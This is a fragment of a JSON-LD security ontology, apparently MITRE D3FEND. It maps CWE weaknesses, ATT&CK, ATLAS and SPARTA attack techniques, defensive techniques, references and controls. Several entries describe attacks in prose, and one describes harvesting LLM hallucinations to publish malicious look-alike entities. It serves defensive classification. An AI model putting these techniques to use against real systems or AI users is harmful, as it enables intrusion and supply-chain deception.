        },
        {
          "@id": "d3f:Non-PersonEntity"
        },
        {
          "@id": "_:Nc2a520c67e55427c8eff969e79240579"
        }
      ]
    },
    {
      "@id": "_:Nc2a520c67e55427c8eff969e79240579",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Person"
      }
    },
    {
      "@id": "d3f:CWE-1126",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1126",
      "d3f:definition": "The source code declares a variable in one scope, but the variable is only used within a narrower scope.",
      "rdfs:label": "Declaration of Variable with Unnecessarily Wide Scope",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:FileHeaderBlockContent",
      "@type": "owl:Class",
      "d3f:definition": "The content of a header block not including the signature.",
      "rdfs:label": "File Header Block Content",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:AML.T0008.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.001",
      "d3f:definition": "Adversaries may acquire consumer hardware to conduct their attacks.\nOwning the hardware provides the adversary with complete control of the environment. These devices can be hard to trace.",
      "rdfs:label": "Consumer Hardware - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Consumer Hardware"
    },
    {
      "@id": "d3f:FileHash",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A File Hash is a fixed-length, unique digital fingerprint generated by applying a cryptographic hash function to the contents of a file.",
      "d3f:identifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "File Hash",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalFingerprint"
        },
        {
          "@id": "_:N21bae94beb40452793670ec286e036b0"
        }
      ]
    },
    {
      "@id": "_:N21bae94beb40452793670ec286e036b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:Reference-NetworkFirewallWithProxy_SecureComputingLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/GB2318031A"
      },
      "d3f:kb-abstract": "A proxy which is part of a firewall controls exchanges of information between two application entities. The proxy interrogates attempts to establish a communication session by requesting entities with a server entity in lower layers in accordance with defined authentication procedures. The Proxy interfaces with networking software to direct a communication stack to monitor connection requests to any address on specific ports. The requestor's address, and the server's address are checked against a access control list. If either address is invalid, the proxy closes the connection. If both are valid, a new connection is setup such that both the requestor and server are transparently connected to the proxy with variable higher levels being connected in a relay mode. Protocol data units are interrogated for conformance to a protocol session, and optionally further decoded to add additional application specific filtering. In one embodiment, an OSI architecture comprises the levels.",
      "d3f:kb-author": "Michael W Green, Ricky Ronald Kruse",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Secure Computing LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Network firewall with proxy",
      "rdfs:label": "Reference - Network firewall with proxy - Secure Computing LLC"
    },
    {
      "@id": "d3f:URLAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:URLAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:URL"
      },
      "d3f:d3fend-id": "D3-UA",
      "d3f:definition": "Determining if a URL is benign or malicious by analyzing the URL or its components.",
      "d3f:kb-article": "## How it works\n\nURLs may contain components, for example:\n\n * scheme\n * userinfo\n * host name\n * port\n * path\n * query\n * fragment\n\nThese components are used as features in analysis algorithms.\n\nContextual information about a URL such as where it is embedded (ex. emails, files, network protocols), header, path, location, and origin information, as well as information about the content returned from the URL request, may be incorporated into an analytic for URL analysis. For example, if a URL indicates a .pdf file but an executable is actually returned, the combination of these two pieces of information indicates suspicious activity.\n\nAdditional techniques include:\n\n* Extracting features of a URL such as domain name length, ratio of consecutive consonants, percentage of digits in a domain, and number of vowels. Values for each feature are combined to develop a score for the URL.\n* Determining the probability of a character occurring in the URL given the preceding two characters. For example, for google.com, the probability of a 'g' occurring at the beginning of a word, the probability of an 'o' occurring after a \"g, the probability of an o\" occurring after a 'g' and \"o, and so forth. A dictionary or a list of known good domains is used to determine probability. Probabilities are multiplied to develop a score for the URL.\n\nURL analysis may trigger follow-on analytics such as **File Analysis**\n\n## Considerations\n\n* Volume of URLs being analyzed, combined with the speed at which they are analyzed\n* Fidelity of analysis technique at detecting brand new URLs versus analyzing URLs of established domains",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForDetectingMaliciousWebsites_EndgameInc"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingRestrictedContentAssociatedWithRetrievedContent_SophosLtd"
        }
      ],
      "rdfs:label": "URL Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "_:Nf6ad2de1012f47109482d2a391e1630e"
        }
      ]
    },
    {
      "@id": "_:Nf6ad2de1012f47109482d2a391e1630e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:EX-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0008",
      "d3f:definition": "Malicious logic is arranged to run at precise times derived from onboard clocks or distributed time sources. The trigger may be absolute or relative. Spacecraft commonly maintain multiple clocks and counters and schedule autonomous sequences against them. An attacker leverages this machinery to ensure effects occur during tactically advantageous windows. Time-based execution reduces exposure, simplifies coordination across assets, and makes reproduction difficult in lab settings that lack the same temporal context.",
      "rdfs:label": "Time Synchronized Execution - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Time Synchronized Execution"
    },
    {
      "@id": "d3f:Reference-StackSmashingProtection_StackGuard_RedHat",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://access.redhat.com/blogs/766093/posts/3548631"
      },
      "d3f:kb-abstract": "In our previous blog, we saw how arbitrary code execution resulting from stack-buffer overflows can be partly mitigated by marking segments of memory as non-executable, a technology known as Execshield. However stack-buffer overflow exploits can still effectively overwrite the function return address, which leads to several interesting exploitation techniques like ret2libc, ret2gets, and ret2plt. With all of these methods, the function return address is overwritten and attacker controlled code is executed when the program control transfers to overwritten address on the stack.",
      "d3f:kb-author": "Huzaifa Sidhpurwala",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Red Hat",
      "d3f:kb-reference-of": {
        "@id": "d3f:StackFrameCanaryValidation"
      },
      "d3f:kb-reference-title": "Security Technologies: Stack Smashing Protection (StackGuard)",
      "rdfs:label": "Reference - Security Technologies: Stack Smashing Protection (StackGuard) - Red Hat"
    },
    {
      "@id": "d3f:CWE-1044",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1044",
      "d3f:definition": "The product's architecture contains too many - or too few - horizontal layers.",
      "rdfs:label": "Architecture with Number of Horizontal Layers Outside of Expected Range",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-002353_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system transmits organization-defined access authorization information using organization-defined security safeguards to organization-defined information systems which enforce access control decisions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002353"
    },
    {
      "@id": "d3f:Reference-CertificateAndPublicKeyPinning",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning"
      },
      "d3f:kb-abstract": "Certificate and Public Key Pinning technical guide to implementing certificate and public key pinning.",
      "d3f:kb-author": "OWASP",
      "d3f:kb-organization": "OWASP",
      "d3f:kb-reference-of": {
        "@id": "d3f:CertificatePinning"
      },
      "d3f:kb-reference-title": "Certificate and Public Key Pinning",
      "rdfs:label": "Reference - Certificate and Public Key Pinning"
    },
    {
      "@id": "d3f:AML.T0095",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0095",
      "d3f:definition": "Adversaries may search public websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or domains owned by the victim.\n\nAdversaries may find the information they seek to gather via search engines. They can use precise search queries to identify software platforms or services used by the victim to use in targeting. This may be followed by [Exploit Public-Facing Application](/techniques/AML.T0049) or [Prompt Infiltration via Public-Facing Application](/techniques/AML.T0093).",
      "rdfs:label": "Search Open Websites/Domains - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0095"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Open Websites/Domains"
    },
    {
      "@id": "d3f:OutboundInternetFileTransferTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:File"
      },
      "d3f:definition": "Outbound internet file transfer traffic is file transfer traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard file transfer protocol.",
      "rdfs:label": "Outbound Internet File Transfer Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:File_transfer"
        },
        {
          "@id": "dbr:Internetworking"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileTransferNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        },
        {
          "@id": "_:N23996b66b9a74773959d3740c75c66cd"
        }
      ]
    },
    {
      "@id": "_:N23996b66b9a74773959d3740c75c66cd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-510",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-510",
      "d3f:definition": "A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism.",
      "rdfs:label": "Trapdoor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:T1218.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.001",
      "d3f:definition": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)",
      "d3f:invokes": [
        {
          "@id": "d3f:CreateFile"
        },
        {
          "@id": "d3f:CreateProcess"
        }
      ],
      "rdfs:label": "Compiled HTML File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N98efe92086f14930a9bad23ac9f7afc3"
        },
        {
          "@id": "_:N8e1d1f40ae13488aa4a405fd4271ab64"
        }
      ]
    },
    {
      "@id": "_:N98efe92086f14930a9bad23ac9f7afc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "_:N8e1d1f40ae13488aa4a405fd4271ab64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:d3fend-display-annotation",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "d3fend-display-annotation",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-annotation"
      }
    },
    {
      "@id": "d3f:signs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x signs y: The entity x applies a digital signature to the digital artifact y, thereby asserting its validity, integrity, and authenticity. Typically, this involves cryptographic techniques to securely bind the signature to y, ensuring that y's contents have not been altered and are authentic as endorsed by x.",
      "rdfs:label": "signs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:validates"
      }
    },
    {
      "@id": "d3f:CWE-1244",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1244",
      "d3f:definition": "The product uses physical debug or test interfaces with support for multiple access levels, but it assigns the wrong debug access level to an internal asset, providing unintended access to the asset from untrusted debug agents.",
      "rdfs:label": "Internal Asset Exposed to Unsafe Debug Access Level or State",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-863"
      }
    },
    {
      "@id": "d3f:has-dependent",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-dependent y: The entity x is relied upon or required by entity y.",
      "rdfs:label": "has-dependent",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyExportEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the export of registry key data from the Windows Registry to an external file or format.",
      "rdfs:label": "Windows Registry Key Export Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:Nac33a23c46924e36ab219da564a1d5be"
        }
      ]
    },
    {
      "@id": "_:Nac33a23c46924e36ab219da564a1d5be",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:Reference-ExecutionWithSchtasks_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-08-001/"
      },
      "d3f:kb-abstract": "The Windows built-in tool schtasks.exe provides the creation, modification, and running of scheduled tasks on a local or remote computer. It is provided as a more flexible alternative to at.exe, described in CAR-2013-05-004. Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations. The scheduled tasks tool can be used to gain Persistence and can be used in combination with a Lateral Movement technique to remotely gain execution. Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The /s flag will cause a task to run as the SYSTEM user, usually indicating privilege escalation.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ScheduledJobAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-08-001: Execution with schtasks",
      "rdfs:label": "Reference - CAR-2013-08-001: Execution with schtasks - MITRE"
    },
    {
      "@id": "d3f:DigitalInformationBearer",
      "@type": "owl:Class",
      "d3f:definition": "A digital information bearer is a physical or virtual entity that stores, transmits, or processes digital information.",
      "rdfs:label": "Digital Information Bearer",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:CWE-1048",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1048",
      "d3f:definition": "The code contains callable control elements that contain an excessively large number of references to other application objects external to the context of the callable, i.e. a Fan-Out value that is excessively large.",
      "rdfs:label": "Invokable Control Element with Large Number of Outward Calls",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:Reference-MethodOfMakingThinAtomicZGradeShields",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110296412A1"
      },
      "d3f:kb-abstract": "A radiation-shielded structural enclosure is formed from layers of material having higher and lower Z (atomic) numbers. The enclosure may be formed from layers of titanium that are bonded to opposite sides of a layer of tantalum. A layer of aluminum alloy may be bonded to at least one of the layers of titanium. The enclosure provides structural support for components disposed inside the enclosure and provides radiation shielding for the components.",
      "d3f:kb-author": "Donald L. Thomsen, III",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "NASA",
      "d3f:kb-reference-of": {
        "@id": "d3f:RadiationHardening"
      },
      "d3f:kb-reference-title": "A Method of making thin atomic (Z) grade shields",
      "rdfs:label": "Reference - Method of making thin atomic (Z) grade shields - NASA"
    },
    {
      "@id": "d3f:PageFrame",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contained-by": {
        "@id": "d3f:PrimaryStorage"
      },
      "d3f:definition": "A page frame is the smallest fixed-length contiguous block of physical memory into which memory pages are mapped by the operating system.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Page_(computer_memory)"
      },
      "rdfs:label": "Page Frame",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryBlock"
        },
        {
          "@id": "_:N28abbb5386ef4dacb196b49c21290db5"
        }
      ]
    },
    {
      "@id": "_:N28abbb5386ef4dacb196b49c21290db5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contained-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:CWE-378",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-378",
      "d3f:definition": "Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack.",
      "rdfs:label": "Creation of Temporary File With Insecure Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-377"
      }
    },
    {
      "@id": "d3f:OSAPITraceProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that enables a program to monitor, control, or interact with the execution of a process.",
      "d3f:invokes": {
        "@id": "d3f:TraceProcess"
      },
      "rdfs:label": "OS API Trace Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Na1ffae9b16824a5a9e6586c6af45fbd1"
        }
      ]
    },
    {
      "@id": "_:Na1ffae9b16824a5a9e6586c6af45fbd1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TraceProcess"
      }
    },
    {
      "@id": "d3f:CWE-843",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-843",
      "d3f:definition": "The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.",
      "d3f:synonym": "Object Type Confusion",
      "rdfs:label": "Access of Resource Using Incompatible Type ('Type Confusion')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-704"
      }
    },
    {
      "@id": "d3f:ComputeDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the operation, state, or performance of computational hardware, such as CPUs, GPUs, or accelerators. These events reflect processing capacity changes, utilization anomalies, or device health.",
      "rdfs:label": "Compute Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N5d0bda3dfc5a4ce38d148b5950c1a3f8"
        }
      ]
    },
    {
      "@id": "_:N5d0bda3dfc5a4ce38d148b5950c1a3f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Processor"
      }
    },
    {
      "@id": "d3f:CWE-231",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-231",
      "d3f:definition": "The product does not handle or incorrectly handles when more values are provided than expected.",
      "rdfs:label": "Improper Handling of Extra Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-229"
      }
    },
    {
      "@id": "d3f:DigitalAudioVisualMedia",
      "@type": "owl:Class",
      "d3f:definition": "Audiovisual (AV) is electronic media possessing both a sound and a visual component.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Audiovisual",
      "rdfs:label": "Digital Audio Visual Media",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMultimedia"
      }
    },
    {
      "@id": "d3f:DE-0009.02",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.02",
      "d3f:definition": "The adversary aligns operations with heightened solar/geomagnetic activity so effects resemble natural disturbances. During storms, receivers struggle with scintillation and increased noise; SEUs and resets rise; navigation and timing degrade; and operators expect anomalies. By conducting EMI, spoofing, or timing-sensitive sequences within these windows, the attacker benefits from ambient interference and plausible attribution to space weather. Telemetry gaps, link fades, or transient upsets appear consistent with the environment, delaying suspicion that a deliberate action occurred.",
      "rdfs:label": "Space Weather - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Space Weather"
    },
    {
      "@id": "d3f:CWE-1431",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1431",
      "d3f:definition": "The product uses a hardware module implementing a cryptographic algorithm that writes sensitive information about the intermediate state or results of its cryptographic operations via one of its output wires (typically the output port containing the final result).",
      "rdfs:label": "Driving Intermediate Cryptographic State/Results to Hardware Module Outputs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:CCI-001991_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, implements a local cache of revocation data to support path discovery and validation in case of inability to access revocation information via the network.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Certificate-basedAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001991"
    },
    {
      "@id": "d3f:T1550",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:AuthenticationService"
      },
      "d3f:attack-id": "T1550",
      "d3f:definition": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.",
      "rdfs:label": "Use Alternate Authentication Material",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Nc1cc5a8f46e044a7bd221f4fe1751b44"
        }
      ]
    },
    {
      "@id": "_:Nc1cc5a8f46e044a7bd221f4fe1751b44",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:ScriptExecutionAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ScriptExecutionAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ScriptApplicationProcess"
      },
      "d3f:d3fend-id": "D3-SEA",
      "d3f:definition": "Analyzing the execution of a script to detect unauthorized user activity.",
      "d3f:kb-article": "## How it works\nSoftware installed on the host system hooks into a scripting engine to intercept commands before they are executed and block commands if they are determined to be harmful. Pattern matching is used to identify unauthorized commands or in the case of script files, a hash of the file is compared against hashes of known unauthorized script files.\n\n## Considerations\nList of known unauthorized script files or regular expression patterns must be kept up to date to ensure detection of new threats.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DetectingScript-basedMalware_CrowdstrikeInc"
      },
      "rdfs:label": "Script Execution Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N61087eab5b824057a99567c153612292"
        }
      ]
    },
    {
      "@id": "_:N61087eab5b824057a99567c153612292",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScriptApplicationProcess"
      }
    },
    {
      "@id": "d3f:TranslationLookasideBuffer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A translation lookaside buffer (TLB) is a memory cache that is used to reduce the time taken to access a user memory location. It is a part of the chip's memory-management unit (MMU).",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Translation_lookaside_buffer"
      },
      "rdfs:label": "Translation Lookaside Buffer",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryManagementUnitComponent"
      }
    },
    {
      "@id": "d3f:AML.T0062",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0062",
      "d3f:definition": "Adversaries may prompt large language models and identify hallucinated entities.\nThey may request software packages, commands, URLs, organization names, or e-mail addresses, and identify hallucinations with no connected real-world source. Discovered hallucinations provide the adversary with potential targets to [Publish Hallucinated Entities](/techniques/AML.T0060). Different LLMs have been shown to produce the same hallucinations, so the hallucinations exploited by an adversary may affect users of other LLMs.",
      "rdfs:label": "Discover LLM Hallucinations - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0062"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover LLM Hallucinations"
    },
    {
      "@id": "d3f:SourceCodeReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Source Code",
      "rdfs:label": "Source Code Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-17_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:control-name": "Remote Access | Disable Nonsecure Network Protocols",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-17(8)"
    },
    {
      "@id": "d3f:Alias",
      "@type": "owl:Class",
      "d3f:definition": "In macOS, an alias is a small file that represents another object in a local, remote, or removable[1] file system and provides a dynamic link to it; the target object may be moved or renamed, and the alias will still link to it (unless the original file is recreated; such an alias is ambiguous and how it is resolved depends on the version of macOS).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Alias_(Mac_OS)"
      },
      "rdfs:label": "Alias",
      "rdfs:subClassOf": {
        "@id": "d3f:SlowSymbolicLink"
      }
    },
    {
      "@id": "d3f:Reference-AutomatedComputerVulnerabilityResolutionSystem",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7308712B2"
      },
      "d3f:kb-abstract": "A system and process for addressing computer security vulnerabilities. The system and process generally comprise aggregating vulnerability information on a plurality of computer vulnerabilities; constructing a remediation database of said plurality of computer vulnerabilities; constructing a remediation signature to address the computer vulnerabilities; and deploying said remediation signature to a client computer. The remediation signature essentially comprises a sequence of actions to address a corresponding vulnerability. A managed automated approach to the process is contemplated in which the system is capable of selective deployment of remediation signatures; selective resolution of vulnerabilities; scheduled deployment of remediation signatures; and scheduled scanning of client computers for vulnerabilities.",
      "d3f:kb-author": "Carl E. Banzhof",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:AssetVulnerabilityEnumeration"
      },
      "d3f:kb-reference-title": "Automated computer vulnerability resolution system",
      "rdfs:label": "Reference - Automated computer vulnerability resolution system"
    },
    {
      "@id": "d3f:T1559.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1559.001",
      "d3f:definition": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)",
      "rdfs:label": "Component Object Model",
      "rdfs:subClassOf": {
        "@id": "d3f:T1559"
      }
    },
    {
      "@id": "d3f:CWE-47",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-47",
      "d3f:definition": "The product accepts path input in the form of leading space (' filedir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: ' filename' (Leading Space)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:T1528",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:AccessToken"
      },
      "d3f:attack-id": "T1528",
      "d3f:definition": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.",
      "rdfs:label": "Steal Application Access Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
